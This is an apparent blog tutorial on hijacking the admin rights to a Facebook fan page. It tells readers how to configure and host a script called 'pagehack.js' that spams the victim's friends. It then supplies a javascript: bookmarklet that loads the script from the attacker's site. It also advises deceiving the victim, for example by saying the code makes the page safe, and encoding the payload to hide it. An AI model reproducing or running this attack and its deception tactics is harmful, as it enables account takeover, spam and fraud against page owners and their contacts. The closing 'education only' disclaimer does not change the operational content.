Now lets start the tutorial of facebook fan page hacking . First of all we will need to setup an exploit and a website to host that exploit. If you already have a registed hosting account then its great otherwise there are couple of free hosting websites that can be used for such purposes like000webhost.com etc.Step 1: First download Facebook page hacking exploit,
CLICK TO DOWNLOAD Facebook page hacking exploit
Step 2: Now open the pagehack.js [in package] with notepad and search forhackerspositive@gmail.com and change hackerspositive@gmail.com with ur facebook email.
Step 3: Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text <b>Hey See what i got!</b> and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15.
Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js) and then save it.
Step 4: Now create a account on free hosting like 0fess.net or 000webhost.com ( 110mb.com won't help this time so do not use it H+ fanz) and upload facebook page hacking exploit on your free hosting website. you will get url address something like this
Step 5: Now ask victim to paste this in browser address bar, He must be admin of page.Which you wants to hack:
javascript:(a = (b = document).createElement("script")).src = "http://www.yourwbesite.com/pagehack.js", b.body.appendChild(a); void(0)
Note : Change http://www.yourwbesite.com/pagehack.js in javascript with ur own address and name u make of your file.
NOTE2: Now a days latest browser did not support it so according to me ask victim to save it as bookmark and then click that bookmark then it will run successfully.
Tip: Tell him that it will make your page safe, or something else like attracting. Encode this javascript into ascii format for more results.
When he will put this key in address bar and that's it you will get a notification that you are admin of his page now.
But don't hack for bad cause, I will not be responsible for any consequences made by you. For education purpose only.!
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